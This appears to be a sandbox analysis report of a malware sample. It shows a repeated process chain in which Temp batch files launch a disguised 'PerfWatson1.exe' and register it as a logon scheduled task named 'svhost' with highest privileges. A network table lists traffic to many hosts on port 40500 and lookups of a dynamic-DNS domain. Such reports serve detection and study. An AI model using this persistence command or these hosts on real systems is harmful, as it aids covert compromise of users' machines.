C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\P46oJqKvEUuL.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uM3DIavRGUUm.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MTrnWyhLZ4vu.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oywZ1RjYJL2A.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lP0orEwl6YvE.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7MwdS0Tay599.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RgeIEF7Q8B77.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bv2QoIJkJ2lv.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DJLmcAudmnxS.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\y6JqB1ZW4QlC.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oheNI52vPxpY.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\engfbP3sWEP9.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\4IqHJVBZHywJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hB4rphTfmte1.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6m5RfUXaVESo.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Is8qQeJEEeAb.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\U8BzXMUL4x7I.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZIkplOsNyMEl.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TeCcyPqutaTw.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hUQV0YNToSBc.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\t8hnzcvOqgaP.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\PBHsljoLLEDJ.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Mh64sxZtnZBA.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rBIRJ2YTqXdn.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bDTxL2S3Odte.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe
"C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe"
C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "svhost" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\KDOT\PerfWatson1.exe" /rl HIGHEST /f
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cH5vOKER0g2y.bat" "
C:\Windows\system32\chcp.com
chcp 65001
C:\Windows\system32\PING.EXE
ping -n 10 localhost
Network
| IR | 46.248.37.226:40500 | udp | |
| US | 8.8.8.8:53 | 226.37.248.46.in-addr.arpa | udp |
| KZ | 178.91.91.13:40500 | udp | |
| GB | 2.101.182.195:40500 | udp | |
| US | 8.8.8.8:53 | 195.182.101.2.in-addr.arpa | udp |
| DE | 37.1.196.35:80 | tcp | |
| UA | 212.22.213.217:40500 | udp | |
| PK | 39.42.48.119:40500 | tcp | |
| MX | 189.142.102.173:40500 | udp | |
| US | 8.8.8.8:53 | 173.102.142.189.in-addr.arpa | udp |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| KR | 123.214.186.171:40500 | udp | |
| IR | 80.191.218.209:40500 | udp | |
| KZ | 109.239.42.219:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| IR | 2.181.218.27:40500 | tcp | |
| YE | 134.35.205.29:40500 | udp | |
| RU | 95.189.161.127:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
| US | 20.83.148.22:80 | tcp | |
| IR | 2.190.224.152:40500 | udp | |
| MX | 189.135.139.214:40500 | udp | |
| US | 8.8.8.8:53 | microsoftsys.ddns.net | udp |
Files